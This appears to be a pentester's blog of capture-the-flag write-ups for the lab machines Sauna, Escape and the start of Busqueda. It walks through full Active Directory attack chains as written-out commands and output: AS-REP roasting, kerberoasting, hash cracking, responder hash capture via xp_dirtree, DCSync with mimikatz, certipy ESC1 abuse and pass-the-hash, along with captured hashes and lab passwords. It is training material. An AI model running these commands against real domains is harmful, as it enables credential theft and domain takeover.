I double-checked other options to pivot, but besides running more wordlists for directories, subdomains are performing an IIS tilde enumeration which would a considerable time to setup I could only bruteforce some usernames and later passwords.

I already found a number of usernames on the website and with my LDAP enumeration. I don’t know the format they user in the company so I decided to use username-anarchy to generate a number of common formats with their full names. I tried to create a nice loop with for and while but I couldn’t make it run username-anarchy correctly for some reason. To save some time I just manually swapped the username data in the username-anarchy Sophie Driver >> users.txt command and create the username list that way.

With this list I ran kerbrute userenum -d EGOTISTICAL-BANK.LOCAL --dc sauna.EGOTISTICAL-BANK.LOCAL users.txt and came with two valid users “hsmith@EGOTISTICAL-BANK.LOCAL” and “fsmith@EGOTISTICAL-BANK.LOCAL”.

I took those usernames, created a smaller wordlists having variants with and without the domain attached and ran them against a relatively small wordlists. Then, I just ran netexec smb 10.129.95.180 -u users.small -p /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt.

While this is going, when I used kerbrute I had an idea. I can check for kerberoast and as-rep roastable users. Nevermind, without any creds, I can only as-rep roast - let’s do it anyway. GetNPUsers.py -request -usersfile users.small -dc-host sauna.EGOTISTICAL-BANK.LOCAL EGOTISTICAL-BANK.LOCAL/ -no-pass

We get one hit really

Loot:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c53a1f5178113124e04b6272ff3b310b$e1e03544cd582d16c1a209f6d03eade305d1486987508688163a7e59956eabf6c5fa32f62531f72a4c0086d683e87fe7c112b6029171b747db50cc455a0b7deef4e0af2ec47dddd9fba2875e1ad2023eaa1c0a77fe06d65771e6171aa3650167b3360d9adb98d4e05fa1b78208c715b1bc14d9addab4079e68a3bddfa3173a5bba4f2865f69a746762bb2e42d5847a15ba7312cbd5d63457cf1178e6ec7295fce2895c088076ab2cfee7e47f6e100729a6010faa4ec70cadf185c17c76b56c72b748410da8b3b07e50ce934e309b2897a8c4364c2f4c0e7c05471f70fc9e309df3430315fd02343141e78b496813798e23be753b581de2681ed27b4897d68998
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL@EGOTISTICAL-BANK.LOCAL:113e3f966c27ca16a99365459ace54ea$a20ebb88b9d118baf304c1a5f374bb80655e2e7cbae4ec8fc8ca5b5c99b320b7775219c33d71b3c9535aa86ce96915b972c6d042de65eddbc3692949b91c3413ab41ca8b4923a367ce68f904b3f4c1198d17c3c81b50bb3ec2486018650402c26d8024a37da117bc127e20f1724675b1da7223716fd75258cfa4c9a5ef28916e7d20644ae91110680532fffba712e0ffc40410747e7c3410c56ccbdb351ec2f05feb11f54de652b047afca7b47e770c744b46e8ec9d632e1acd58a5d97819615e6dbf0a05b7d502badde77179c89fcd5c48df80e64eef99b375333c37febe38f2120d4f59e5d50d23168e202fad03c85b6e3a72c28a940ab16557deeb87bd7d6

I scraped that data for the user fsmith into a separate file and run it through rockyou.txt hashcat -m 18200 fsmith.asrep /usr/share/wordlists/rockyou.txt. We got credentials! fsmith:Thestrokes23

I checked different services that the user can access with netexec and found that they can winrm into the host and see some non-default SMB shares. I went into the host, and grabbed a user flag from there. I did some manual enumeration and didn’t find anything promising. In the /Users file we can see once service account which has an unexpected error message when we try to access their files Cannot find path 'C:\Users\svc_loadnmgr' because it does not exist.

Looking at those SMB shares, one of the custom ones is most interesting as I have write permissions on it, “RICOH Aficio SP 8300DN PCL 6” with a remark “We can’t print money” - let’s check it out. smbclient -U fsmith "//10.129.95.180/RICOH Aficio SP 8300DN PCL 6". Sadly I can’t view the contents of this share. Looking at the second one “print$” we can see that it’s likely connected to a printer or to its configuration or internal file structure.

Bloodhound

It all seems to be hinting for like a printerspooler priv-esc vector. Before I decide on my path, let’s check bloodhound first. bloodhound-python -u fsmith -p 'Thestrokes23' -d EGOTISTICAL-BANK.LOCAL -dc sauna.EGOTISTICAL-BANK.LOCAL -ns 10.129.95.180 -c all; rusthound-ce -d EGOTISTICAL-BANK.LOCAL -u fsmith -p 'Thestrokes23' --zip -c All

Bloodhound shows that:

“SAUNA.EGOTISTICAL-BANK.LOCAL” computer object has weak supported encryption types
“HSMITH@EGOTISTICAL-BANK.LOCAL” is kerberoastable
“SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL” has GetChanges on “EGOTISTICAL-BANK.LOCAL” itself.

Looking at the RICOH Aficio SP 8300DN PCL 6 printer OSINT I see it was related with some vulnerabilities in the past. This is likely something I could use. My current plan of attack is to kerberoast HSmith. Then I will see if he has any additional accesses (like that SMB share), and then look for a printer exploit. I suspect that a successful exploit will drop me into a svc_loanmgr account which I hope has DCSync rights.

Privilege Escalation

hsmith

I start with that kerberoast. First sudo ntpdate 10.129.95.180 to fix the skew, and then GetUserSPNs.py -request-user hsmith -dc-ip 10.129.95.180 EGOTISTICAL-BANK.LOCAL/fsmith:Thestrokes23. Below is the hash.

$krb5tgs$23$*HSmith$EGOTISTICAL-BANK.LOCAL$EGOTISTICAL-BANK.LOCAL/HSmith*$87d4af1eafee29c894d27ab456393742$bdfdc805b821d7aaf3a5aedfae4002a103da6786c62849393f39742c2fd31fa53569e62c5fb1b19d1f9e49168ce774d807127ec4ff8d92937e4a81b7e66ea688c0be7a6c15b23c9fe00e6d1a020581f46d8496ea3526704daf5920b793dfd82304371d6d3c545fa62f6177a32ad861f0a54e4254f06855e3052b30f619a6677c6b2c94687dc7642ad071372c098f94fcada4184fa681d7e09b33c515743518f602ace271d6d97d8dcd79384940272e0d2a8352b4fe95d492e183e47b060e9b3548da2a3912955f3828a37fa2bfbc5d210df19a5e3ccaba94e5f6de442e1f1ae488924b2c0d109ef2a64f7c713ef0de1be16ec3f7310b0a4c477e84b5ce239e476fb8cdafd5023aa0918db59751473c71759c6ab69db9500848bb6506a47c223e72eb4b6f02e1e89f265d0a7e7ca08c28308fd5a8a837ea03a315477b57a1ffa4a04baf5e8f0f75fc4f43e571685fa1f983b03f44de78eafbd2d9f56c3643b55ee6c9d928a935d5cafd4f94ce47c38de6259973a3843f2e2145a159d180191186b157e340f239d9356a6c39d00f5d1e75b3ef77796a775f8ab0a83d2a19da68cd3ef4b977cf23adec084d357e7081b18c66e7979fe1a2074e52a7d416cde0cf4abce3d1f2137278eb1ebc2eb024d8f971fa870adf29e1bb0d07f1e7350d5196767063b4ab7358c0087a7dfc94318a947f23aa81644bfbd0bc067ad88bfd5ff64603a56705b79b8af422ae66f802fa519e07cf3e6fa6c2562a4cff0a76e4f88d1a0ae9503c64056a90b5b5b95037168ee01b1a15152bb9dceb43ac01fa713c4afbdfa35f28d188bda987e4d564dcf68852b0b1fdee4f3aefd3d3d724a11f818b337959ac353d5637236544e7071dcf31dd142f2550b0e3fc5f88e84e097f8844ca9cf0639ebf32874145b1ee79bb13ad9d4027c7650520781652945a811d5f6d35d44fa76937de1f9b2e08d1558615339c9030fd1b321860ca715a091e929f4048bd65fb113745c7d650ee090c5014c3334d3637c729cc2139f418b91270810bdcd2357572af0ab2331afcc4449016f01ecffffff1d8abcdcd77c8c2ef22383db03657aed641d544be2da47b2c5aade8033806821dc89212fbf3e7dc177637403a1f1c4c05878b238ae429f970f127a100d8fc72475be187bed11dbf6aa6e2c6222f86f036532c773c05003d2593fc1f6949c37812ad0b3f9f1034e087b2dc735be9e0934a88c082517fbc85591a61290ff1df4d164e92a8f049919086da586ee9a04cab70538cf2f302de60cbb00a0cba47ec0b88bc0faa267c728479035b29d0ca4099fbea1bb7a93246618875576a171cacbf34f0a117eac91334aeee1009e4fcb6092e20a08fdde8c270828cf09e8f695620adb8bca857b39cc6d5e7b4f7f7157ee3058d

I put it into a separate file and run through rockyou.txt with hashcat -m 13100 hsmith.tgs /usr/share/wordlists/rockyou.txt. I cracked the passwords and it’s “Thestrokes23” the same one as for fsmith. I enumerated this account a bit and it seems to have the same set of rights and permissions as fsmith but lacking in some aspects - lack of winrm for example.

I feel like this is a unintended to follow this new account. I will read up on that printer and think of a plan how to exploit it with my correct credentials. If nothing will come to my mind I will consider looking if I can somehow enable the svc_loanmgr account and maybe run WinPEAS as well.

svc_loanmgr

Promising article. There seems to be also a Metasploit module for it, but I’d rather do it manually. I studied this article and tried to edit attached scripts but I didn’t feel confident they would work. I went the Metasploit way, I created a meterpreter shell, ran it and caught it with exploit/multi/handler and tried to run the exploit from there. On both x64 and x86 versions of the payload I got information that the payload failed because the architecture didn’t match the environment. I tried migrating the process around to no avail.

I decided to take a step back and run WinPEAS on the target host to look for any alternative ways to priv-esc. To my surprise, winpeas found clear-text autologon credentials! I don’t think I ever seen them utilized on a box before - svc_loanmanager:Moneymakestheworldgoround! I checked possible access with netexec but I didn’t find anything. I also struggle to spawn a cmd or PowerShell shell with runas within winrm.

Previously I noted this fact "SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL" has GetChanges on "EGOTISTICAL-BANK.LOCAL" itself. I will try to run secretsdump.py with the creds I know and maybe I will be able to dump the data. secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmanager:'Moneymakestheworldgoround!'@sauna.EGOTISTICAL-BANK.LOCAL

I wasn’t able to dump that data and a struggle a lot to understand why the user is not being found by my tools. I search with ldapsearch and enumerated a lot of data. I later realized that the user was names first “svc_loanmanager” but in bloodhound it’s “svc_loanmgr”. I took me too long to admin that mistake. Even though I fixed my secretsdump.py syntax it still would allow me to dump the data.

Administrator

I then double-checked my permissions in bloodhound and proceeded to download mimikatz on the target. I wasn’t able to run it interactively with .\mimikatz.exe as it looped in trying to start mimikatz in that mode. To avoid it, I ran it with one liners like .\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit.

This command returned the administrator’s NTLM hash - 823452073d75b9d1cf70ebdf86c7f98e which I used with evil-winrm -i 10.129.95.180 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e

Closing Thoughts

Sauna is an interesting machine. It goes through a relatively straight-forwards attack path but I fell into a number of false assumptions and rabbit-holes which costed me a lot of time. It’s serves as a great reminder to perform a full enumeration before jumping into any conclusions, to leave no stone upturned and to pay attention to small details.

My first assumption was that the foothold will be related to the website, but at the end it wasn’t really useful besides learning the names of some users. Later I convinced myself that the correct privilege escalation vector will be related to a printer - CVE-2019-19363 to be specific - but it wasn’t it at all. Lastly I wasted a lot of additional time figuring out why “svc_loanmanager” didn’t work, and I didn’t connect the dots that the username was wrong or just edited in the past.

Fun box.

Escape

EmilPawlak@protonmail.com (Emil Pawlak) — 08.04.2026

Enumeration

I ran my favorite nmap commands on the provided IP.

nmap scan results

Stats: 0:00:00 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.55% done
Nmap scan report for 10.129.19.47
Host is up (0.028s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-06 22:57:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-04-06T22:55:27
|_Not valid after: 2056-04-06T22:55:27
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2026-04-06T22:59:14+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-06T22:59:13+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019
Aggressive OS guesses: Windows Server 2019 (97%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
| date: 2026-04-06T22:58:34
|_ start_date: N/A
| smb2-security-mode: 
| 3:1:1: 
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.48 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 16:59 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49689/tcp open unknown
49690/tcp open unknown
49711/tcp open unknown
49720/tcp open unknown
49741/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 105.05 seconds
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-06 17:01 CEST
Nmap scan report for 10.129.19.47
Host is up (0.029s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

We can see a number of Active Directory related ports opened. From the output I see the domain name and DC name as well - sequel.htb & dc.sequel.htb. I will add them to /etc/hosts and start from enumerating DNS.

DNS

For enumerating DNS I like to run a number of dig commands. I like to first start by enumerating the name server dig @sequel.htb dc.sequel.htb NS. dig @sequel.htb dc.sequel.htb SOA for basic information about the domain. The mail server dig @sequel.htb dc.sequel.htb MX I also like to check TXT and ALL for some left over data. And at the end I like to test for a zone transfer with dig @sequel.htb dc.sequel.htb SOA.

I also try to enumerate all domains and subdomains to make sure that I don’t miss anything. dig’s output is pretty messy, but It’s good to practice working with it.

SMB

I found no new data with DNS, let’s look for some easy data with null SMB access. Unfortunately there isn’t an anonymous access to it. I also run sudo ntpdate sequel.htb just to make user it’s not because of the time skew.

Seeing as the domain is named “sequel” maybe there is “prequel” or other subdomains in general. I will check in a second, I want to enumerate users on the domain. It can be done with netexec smb 10.129.19.47 -u 'guest' -p '' -rid-brute but it looks like the guest account is disabled.
PS: It was enabled, maybe uppercase would help or there was some setting that didn’t allow it to work. Admittedly, I didn’t look deeply into that.

Background scanning

For subdomains, I would usually run something like ffuf -u sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/ -H "Host: FUZZ.sequel.htb" in the background, but ffuf requires HTTP and a web server for this to work so it won’t fly. gobuster dns -d sequel.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt on the other hand, queries DNS directly. It’s slower but it does the job.

Background subdomain bruteforce found no new domains.

LDAP

I can check if I can scoop some data with some anonymous ldapsearch queries. I ran ldapsearch -x -H ldap://10.129.19.47 -b "DC=sequel,DC=htb" but it looks like LDAP requires credentials to correctly bind and server me info. RPC similarly denies me entry when I try a null session - rpcclient -U -N 10.129.19.47.

Interesting how little information I found, I actually double-checked my connection to make sure all is working well. From interesting services on opened ports I didn’t yet check MSSQL out. But I don’t think there is any anonymous or null authentication for it. Funny how the box name is “Escape” but I can’t “Enter” it so far. Wsman and ADWS are similar, they require authentication and creds to be useful.

Foothold

I went back on my steps and noticed that I imputed the smbclient flags incorrectly. Previously I ran smbclient -L -N //10.129.228.253/ but the correct placement is smbclient -N -L //10.129.228.253/.

With smbmap -H 10.129.228.253 -u 'anonymous' -p '' I can see that the only readable shares for me are now IPC and Public. In the Public share we can find a “SQL Server Procedures.pdf” file with I downloaded to my host. I can’t run ls inside IPC so It seems I have insufficient permissions to properly enumerate it. The pdf holds information about previous incidents in the company related to insecure practices with their SQL servers at their company. From the pdf we got a step-by-step guide how to access the database, command to do so, basic credentials and a number of users mentioned. Also an email so we know the naming structure if it will come to some sort of bruteforcing.

Users:
Ryan
Tom
Brandon (Brandon.Brown@sequel.com)

Credentials: PublicUser:GuestUserCantWrite1

The guide mentions to use cmdkey /add:"<serverName>.sequel.htb" /user:"sequel\<username>" /pass:<password> however this is a windows command. I’m fairly certain that I can just plug them into mssqlclient.py from impacket. impacket-mssqlclient PublicUser:GuestUserCantWrite1@10.129.228.253.

MSSQL

I managed to authenticate to the SQL Server. I checked what databases are there with:

SQL (PublicUser guest@master)> SELECT name FROM sys.databases;
name 
------ 
master 
tempdb 
model 
msdb 

Later, I enumerated the MSSQL with these basic commands:

Use a database - USE master
Show tables - SELECT name FROM master.dbo.sysdatabases
Access data in tables - SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES

But I didn’t find anything useful. I went through my other notes and tried to use XP_CMDSHELL, read files and impersonate other users that I found before but all didn’t lead to any privilege escalation. I searched further and with SELECT srvname, isremote FROM sysservers I found out that there is another SQL server. Judging by the context, this is the original DC Mockup. Sadly EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [DC\SQLMOCK] shows that my current user has insufficient permissions to query it.

As there is no one I can impersonate and my user has lacking permissions I will look for some password reuse. I checked with netexec what PublicUser can do. It showed that it could query LDAP but after trying it out with ldapsearch It seems that even tho it can correctly authenticate, it’s being denied the permission to do so.

Looking though my other notes for MSSQL I found that there is a way to catch an MSSQL’s NTLMv2 hash with responder so I tried that. I ran responder -i tun0 and then in MSSQL EXEC master..xp_dirtree '\\10.10.15.189\random' to trick it into authenticating to my host. This worked and I caught the hash.

Loot:
[SMB] NTLMv2-SSP Client : 10.129.228.253
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:2d7a260b829dfd6c:20DBD9BB0FAD204C34040A771E96C595:0101000000000000808D60B351C7DC01C44CDB13A2F20E1600000000020008004B004E005400310001001E00570049004E002D00390033003200570036004B004600550050003900360004003400570049004E002D00390033003200570036004B00460055005000390036002E004B004E00540031002E004C004F00430041004C00030014004B004E00540031002E004C004F00430041004C00050014004B004E00540031002E004C004F00430041004C0007000800808D60B351C7DC0106000400020000000800300030000000000000000000000000300000B3C49F6D23AD7F502D71A2E45F21AB5A0C4CE49C19953B329BBA1A333BE0E0F20A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100380039000000000000000000

I copied the NTLMv2 hash into a file and ran it against rockyou with hashcat sql_svc.hash /usr/share/wordlists/rockyou.txt. With that, I cracked it - sql_svc:REGGIE1234ronnie

Privilege Escalation

Now as a sql_svc I want to check what I can authenticate to. I grew a bit tired to running a few separate netexec commands so I created a simple loop for that: for p in smb winrm mssql; do netexec $p 10.129.228.253 -u ''sql_svc -p 'REGGIE1234ronnie'; done PS: I actually created a small bash script for this, you can find it here :)

I noticed that - interestingly - sql_svc has access to winrm which I didn’t expect. I used evil-winrm and successfully authenticated into the host. I started to manually enumerate the user’s files but I didn’t find anything useful there, no creds, not user flag and nothing of note in AppData. I enumerated the user’s one the host.

d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc

Going down into the root directory I saw the “SQLServer” folder and entered it. I looked around and downloaded any log, config or generally interesting files into my localhost so I can go through them in search of any leaks, mentioned vulnerabilities, custom scripts or software versions.

One of those files was ERRORLOG.BAK which after further inspection shows that the user Ryan.Cooper tried but failed to authenticate into the SQL server. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] Amid this data we can see that the user - likely by accident - inputted their password in clear-text as a username - Ryan.Cooper:NuclearMosquito3

Similarly to sql_svc i ran netexec and looked what I can access with the new user. Seeing that I could access the host via winrm I did just that. Looking at the user’s files I found the user flag on the Desktop, and begun to look for further privilege escalation vectors. I enumerated the AppData folder, looked for custom scripts, ran whoami /all and generally did a basic lookup of what I could do as the user.

WinPEAS

Not finding any low-hanging fruit, I decided to download and run WinPEAS as well as enumerate the domain with bloodhound-python and rusthound. Below are some interesting parts of WinPEAS output which I decided to note.

Promising winPEAS output

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Named Pipes
 Name CurrentUserPerms Sddl
 eventlog Everyone [Allow: WriteData/CreateFiles] O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)
 MSSQL$SQLMOCK\sql\query Everyone [Allow: WriteData/CreateFiles] O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
 ROUTER Everyone [Allow: WriteData/CreateFiles] O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)
 RpcProxy\49689 Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)
 RpcProxy\593 Everyone [Allow: WriteData/CreateFiles] O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)
 SQLLocal\SQLMOCK Everyone [Allow: WriteData/CreateFiles] O:S-1-5-21-4078382237-1492182817-2568127209-1106G:DUD:(A;;0x12019b;;;WD)(A;;LC;;;S-1-5-21-4078382237-1492182817-2568127209-1106)
 vgauth-service Everyone [Allow: WriteData/CreateFiles] O:BAG:SYD:P(A;;0x12019f;;;WD)(A;;FA;;;SY)(A;;FA;;;BA)
---
MinPasswordLength: 7
---
ÉÍÍÍÍÍÍÍÍÍÍ¹ Autorun Applications
È Check if you can modify other users AutoRuns binaries (Note that is normal that you can modify HKCU registry and binaries indicated there) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
Folder: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
	FolderPerms: Ryan.Cooper [Allow: AllAccess]
	File: C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini (Unquoted and Space detected) - C:\Users\Ryan.Cooper\AppData\Roaming\Microsoft\Windows
	FilePerms: Ryan.Cooper [Allow: AllAccess]
	Potentially sensitive file content: LocalizedResourceName=@%SystemRoot%\system32\shell32.dll,-21787
---
If you can modify a template (WriteDacl/WriteOwner/GenericAll), you can abuse ESC4
 Dangerous rights over template: User (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: UserSignature (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: ClientAuth (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: EFS (Rights: WriteProperty,ExtendedRight)
 Dangerous rights over template: UserAuthentication (Rights: WriteProperty,ExtendedRight)
 [*] Tip: Abuse with tools like Certipy (template write -> ESC1 -> enroll).

The named pipes seen above sounded as a possible priv-esc but from what I gathered if there is no impersonation, SYSTEM/Administrator or “Full Control” permissions then It likely won’t do much.
I noted that the minimal password length was 7 characters in case of a need to bruteforce.
I noticed an interesting potentially sensitive file mentioned in an autorun application but similarly to the named pipes, it didn’t mention any highly privileged users so it would likely not help much.
The last part I noted was information about dangerous rights over a few templates (so ADCS) which could be interesting. I had some experience with those and I have a bad habit of forgetting to enumerate this vector with certipy.

I kept a mental note of the aforementioned vectors and judging by my gut feeling of how successful they might be I decided to focus on the ADCS path of attack.

bloodhound-python & rusthound

Before I did anything tho, I wanted to still look what bloodhound can show me, as I could’ve very easily miss some group rights or permissions. Also, it’s easy to get data from bloodhound and It will come in handy when creating certipy commands.

I run by bloodhound command with bloodhound-python -u Ryan.Cooper -p 'NuclearMosquito3' -d sequel.htb -dc dc.sequel.htb -ns 10.129.228.253 -c all; rusthound-ce -d sequel.htb -u Ryan.Cooper -p 'NuclearMosquito3' --zip -c All --ldaps getting both general data from bloodhound-python and some additional certificate data that rusthound covers and begun to enumerate.

Certipy - ESC1

Admittedly, I didn’t find anything really useful, no additional paths of escalation. Because of that I decided to go with certipy.

I scanned Ryan’s permissions on certificates with certipy find -u Ryan.Cooper@sequel.htb -p NuclearMosquito3 -target-ip 10.129.228.253 -vulnerable -stdout and from the output I noticed that Ryan.Cooper seems to be vulnerable to ESC1. After double-checking with my notes from Authority, he seems to check all the required boxes for this to work. Said requirements are:

Enrollee Supplies Subject = True
Client Authentication = True (or a few others)
“User Enrollable Principals” showing a group your user is a part of
Requires Manager Approval = False
Authorized Signatures Required = 0

So, I begun to stitch together a certipy command. I ran -debug a few times as I never manage to run it correctly on the first try and came back with this one: certipy req -u 'Ryan.Cooper@sequel.htb' -p 'NuclearMosquito3' -dc-ip '10.129.228.253' -target 'dc.sequel.htb' -ca 'sequel-DC-CA' -template 'UserAuthentication' -upn 'administrator@sequel.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-1105' -dc-host dc.sequel.htb -target-ip 10.129.228.253. Small rant: My god is certipy’s syntax annoying to follow. It feels like I need to repeat the same thing three times in one command.

Anyway, I got the administrator.pfx file which is a bundle of a certificate and a private key. I used it to authenticate as an administrator so that I could get a TGT and an NTML hash - certipy auth -pfx administrator.pfx -dc-ip 10.129.228.253. I also had to fix my time skew so I ran sudo ntpdate 10.129.228.253 and below is the loot:

Loot:
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee

With this information the box is really solved. Now I just had to pick a way and a tool to authenticate as an administrator. I decided to use Kerberos as I’m a bit less familiar with it than NTLM.

I checked if I had any other kerberos tickets saved up in my cache as a good practice:

azaeir@parrot (~): echo $KRB5CCNAME 

azaeir@parrot (~): klist
klist: No credentials cache found (filename: /tmp/krb5cc_1000)

Seeing as there isn’t anything there, I added the administrator.ccache that I obtained into my KRB5CCNAME environment variable:

azaeir@parrot (~): export KRB5CCNAME=administrator.ccache 
azaeir@parrot (~): echo $KRB5CCNAME 
administrator.ccache

And authenticated to the host with psexec.py -k -no-pass sequel.htb/administrator@dc.sequel.htb. I found the root flag on the Admin’s desktop.

Closing Thoughts

Escape is a great machine covering basic network enumeration, intermediate knowledge about MSSQL attack vectors and escalation with ADCS. It doesn’t show any niche techniques or obscure vulnerabilities but provides some great fundamental challenges with a seamless and intuitive attack path.

It was a good box to sharpen some core elements a pentester’s methodology, little to know curve-balls which I do appreciate.

Busqueda

EmilPawlak@protonmail.com (Emil Pawlak) — 06.04.2026

Enumeration

nmap

I ran my nmap scan and found both HTTP and SSH opened. Given that SSH is likely used later and that we don’t have any credentials I checked the website. When i accessed it I noticed that I got a domain name rather than an IP in my URL - searcher.htb - I added it into my /etc/hosts.

nmap scan results

Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-05 00:09 CEST
Nmap scan report for 10.129.228.217
Host is up (0.028s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 256 4f:e3:a6:67:a2:27:f9:11:8d:c3:0e:d7:73:a0:2c:28 (ECDSA)
|_ 256 81:6e:78:76:6b:8a:ea:7d:1b:ab:d4:36:b7:f8:ec:c4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://searcher.htb/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=4/5%OT=22%CT=1%CU=31695%PV=Y%DS=2%DC=I%G=Y%TM=69D18C3B
